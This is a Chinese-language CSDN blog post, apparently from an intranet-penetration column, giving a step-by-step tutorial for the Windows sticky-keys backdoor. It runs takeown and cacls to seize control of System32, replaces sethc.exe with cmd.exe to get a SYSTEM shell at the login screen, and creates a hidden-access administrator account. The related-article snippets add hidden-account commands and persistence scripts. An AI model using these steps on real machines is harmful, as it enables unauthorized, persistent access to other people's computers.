粘滞键后门

最新推荐文章于 2024-03-14 14:58:18 发布
最新推荐文章于 2024-03-14 14:58:18 发布
阅读量956 收藏 1
点赞数 3
分类专栏: 内网渗透 文章标签: windows 后门,木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sanqin_/article/details/107349905
版权

粘滞键后门

原理

  cmd.exe 覆盖 sethc.exe

sethc.exe:Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。

效果

  连按五次shift会打开cmd,而不是sethc

流程

cmd操作流程

  1. 进入system32 目录
  2. 更改目录拥有者,归于管理员组
  3. cacls 更改文件的权限,为后面操作做铺垫
  4. 更改文件属性,让管理员对目录完全控制
  5. 备份sethc.exe以防不测
  6. cmd.exe覆盖sethc.exe,此时流程已完成,sethc已变为cmd

实操

按照实操流程介绍各个指令在这个后门的用法

Takeown指令参数:
    /R 递归: 指示工具运行于指定的目录和子目录里的文件上。
    /A 将所有权给于管理员组,而不是当前用户。
    /F 指定文件名或目录名模式。

操作:
    Takeown /R /A /F *.*
  表示所有文件归于管理员组,“ * ”为任意数量的任意字符
在这里插入图片描述
Cacls指令参数:
    /E 编辑 ACL 而不替换。
    /T 更改当前目录及其所有子目录中
    /G 赋予指定用户访问权限。R读取,W写入,C更改(写入),F完全控制

操作:
    Cacls C:\Windows\system32\*.* /E /T /G administrators:F
  表示管理员对此路径下的目录完全控制
在这里插入图片描述

前面的铺垫都是为了这一步

    Move cmd.ext sethc.exe
  使cmd覆盖sethc
在这里插入图片描述
验证漏洞是否可用
在这里插入图片描述
已是成成的了

  这里有一个要注意的点,在这个界面呼出cmd,因为没有登入用户,所以此cmd是以最高权限运行的
  若是登入用户则是以当前用户权限运行

快乐时光
在这里插入图片描述
创建用户 ajie
赋予ajie管理员权限
激活ajie用户

重启
在这里插入图片描述
可见新用户,登入
在这里插入图片描述
其实只要自身权限允许,把setch删了,然后cmd改名就行

  还有一种方法是通过注册表来实现,通过修改注册表的映像劫持和打开其远程桌面来实现。这里就不细谈
  然后其他可以用快捷键呼出的东西,基本都能用此方法留下后门,配合一些奇思妙想可以产生一些神奇的操作
在这里插入图片描述

粘滞后门详述
发哥微课堂
03-07 8795
0x00:介绍 首先介绍一下粘滞粘滞很多人都知道,windows 系统下连续按 5 次 shift 可调出其程序,但使用可能有一部分人不太了解,毕竟这个功能一般我们都用不到,粘滞是为了那些按钮有困难的人设计的,也可理解为残疾,就是按困难,一次只能按一个的这种需求,那么如果用 ctrl+c,ctrl+v 这种快捷或者其他需要组合的时,就会有困难,不具备一次按两个或多个的能力,那么...
win7环境下利用shift粘滞漏洞获得用户密码(图文步骤)
stwtr007的博客
09-09 1328
在win7种本地利用shift五次粘滞功能获得密码 1、在未登录系统时,连续按5次shift,弹出程序c:\windows\system32\sethc.exe 2、部分win7及win10系统在未进入系统时,可以通过系统修复漏洞篡改系统文件名! 注:如win7或win10系统已修补漏洞2,则无法利用 1.2破解过程相关知识 1、cmd工具路径 c:\windows\system32\cmd 2、用户/账户密码存储位置 c:\windows\system32\config\SAM # 非逆转型加密、使用
粘滞后门-自动创建-批处理版(axun)
11-25
很古老的漏洞了,这个太简单了,没什么好描述的,不知道粘滞后门的自己上网查查
windows图形化界)粘滞后门
m0_60936698的博客
03-02 542
windows图形化界)粘滞后门 思路:windows图形化界面未登入用户时,连按5次Shift粘滞的程序依然可以弹出,若若把粘滞的程序改为其他程序则有不一样的效果(如cmd程序)。 一、手动直接修改文件名 ①在windows 中C:\Windows\System32下找到sethc.exe(辅助功能快捷),发现无法直接修改文件名且提示《您需要TrustedInstaller提供的权限才能对此文件进行更改》,没有权限,权限属于另一个用户组。 ②在管理员权限下修改se.
Windows粘滞后门
最新发布
carmi的博客
03-14 1035
此时假如该设备设置了这种粘滞的话就可以通过调出cmd窗口(管理员状态)进行用户的创建,并将该用户归入到管理员组当中,就可以实现没有用户信息即可登入设备的操作——粘滞后门。在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞sethc这个应用程序(系统进程)。出现这种情况的原因是:由于刚刚已经将权限给到管理员,但管理员的权限始终未变化,所以还是不能修改文件名称(提高)。右cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限。
可自删除 开启3389创建用户粘滞后门的vbs
09-06
### 可自删除开启3389创建用户粘滞后门的VBS脚本解析 #### 一、概述 本文将对一个特定的VBS(Visual Basic Script)脚本进行详细分析,该脚本的功能是开启3389端口,并通过创建用户和设置粘滞后门来实现远程...
一个delphi和C写的粘滞后门
06-03
标题 "一个delphi和C写的粘滞后门" 提示了这个压缩包包含的是一个用 Delphi 和 C 语言编写的恶意软件样本,具体来说是一个利用“粘滞”功能的后门程序。粘滞Windows 操作系统中的一个辅助功能,允许用户在...
win10中关于用粘滞留下后门
qq_42761527的博客
08-19 4017
win10中的连按五下Shift会出现粘滞,那么怎么利用这一漏洞当作后门,登陆别人电脑呢 先要了解粘滞和命令提示符的快捷应用是sethc.exe和cmd.exe 而且这两个文件都在win10的c盘下的system32中 通过以上几条命令留下后门 当你在接触别人电脑时,可以通过连续五下shift启动命令提示符,在命令提示符中修改用户登录口令 ...
win10原版粘滞文件
08-05
win10原版粘滞文件
沾滞shift后门
Jietewang的博客
02-05 2085
1. 简介 沾滞的目的是为了帮助那些按有困难的人设计的
关于windows粘滞后门漏洞
qq_52134654的博客
06-30 2840
该漏洞仅适用于Windows7及以下的windows操作系统。粘滞是一种快捷,是为同时按下两个或多个有困难的人而设计的,要功能是方便Shift、Ctrl、Alt与其他的组合使用。启动粘滞可通过单击“开始→设置→控制面板→辅助功能选项”,在“盘”选项卡下选中“使用粘滞”来启动。或者连续按shift五次。开启粘滞的时候,任务栏右边的系统托盘区会出现粘滞图标。...
逆向某粘滞后门
m4s7er的专栏
12-10 1259
前几天有基友在群里发了一个shift后门求逆,最近正好开始学习一些逆向知识,就下载下来练练手。 下载下来拖入虚拟机打开,5下shift运行后发现是一个高仿shift后门,peid查壳是ASProtect壳,载入OD脚本脱壳,把脱壳之后的程序再次拖入peid,发现是一个VB写的后门。 高仿shift后门需要激活,一般的激活方式就是鼠标动作激活或者热激活。用VB Decompiler把程
Windows后门--教程(五)——shift粘贴后门
W小哥
03-16 4782
一、shift粘贴后门介绍 Shift粘滞是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。 (辅助功能镜像劫持是一样的原理) 二、shift粘贴后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 靶机: windows Server2012 IP: 192.168.2
lpk劫持方式粘滞后门后门T00ls Lpk Sethc v3.0 正式版下载
weixin_34168880的博客
03-27 229
从lpk到lpk2到现在也半年多了 让3.0做个完结吧该写的功能也写完了 3.0集中修复了几乎所有的bug 包括密码被破解方面的问题 以及windows文件保护的问题!新增加了wget和后门界面的加账号 , 加wget是因为我在很卡的服务器想打开ie下个东西很困难..比如你要下个cain 打开个华军卡的你半死 所以我就写了个这个 当然你还可以在...
粘滞后门-自动创建-批处理版
言川的博客
11-25 2104
<br />粘滞后门虽然是很久以前的事了,但是现在很多XP的电脑依然存在这个漏洞(还有大名鼎鼎的智能ABC输入法漏洞),汗……。<br />不懂得童鞋上网查查就知道了。<br />用批处理替换sethc.exe文件,创建后门。在登录的时候连续按五次shift打开命令行。<br />下次考虑直接把他替换成一个自己的程序,按shift自动登录。留着,以后更新。<br /> <br />下载地址:<br />http://download.csdn.net/source/2859825<br />附上源码:<
Windows权限维持—自启动&映像劫持&粘滞&辅助屏保后门&WinLogon
剁椒鱼头没剁椒的博客
08-17 1851
Windows系统中,很多后门利用的方式不是太会区别在域中还是单机上,只是需要考虑在没有网络情况下,如何将shell反弹回来,就比如,在域中一个无网络的主机和一台有网络的主机,前期通过有网络的主机转发上线到无网络主机上,那么我们木马是不是也可以这样设置,在无网络中设置一个正向木马,让其在运行,在有网络中设置一个反向的木马,让其运行,那么我们去连接的时候只要去连接反向木马就可以了,然后在通过这个反向木马去连接正向木马,不就可以了。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。
Windows系统隐藏用户及粘贴后门
qq_43590351的博客
09-06 702
Windows系统隐藏用户 该方法是通过建立隐藏账户,制作系统用户远程控制后门,维持目标Windows 系统权限。制作方法跟步骤如下: 已经获取系统权限执行添加用户操作 net user hahaha$ Aa123456 /add net localgroup administrators hahaha$ /add net user 如上图,我们已经创建成功,执行net user命令,发现是看不到hahaha$用户的: 但是这就结束了吗,没有!虽然上面net user看不见该隐藏用户, 但是在控制面
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值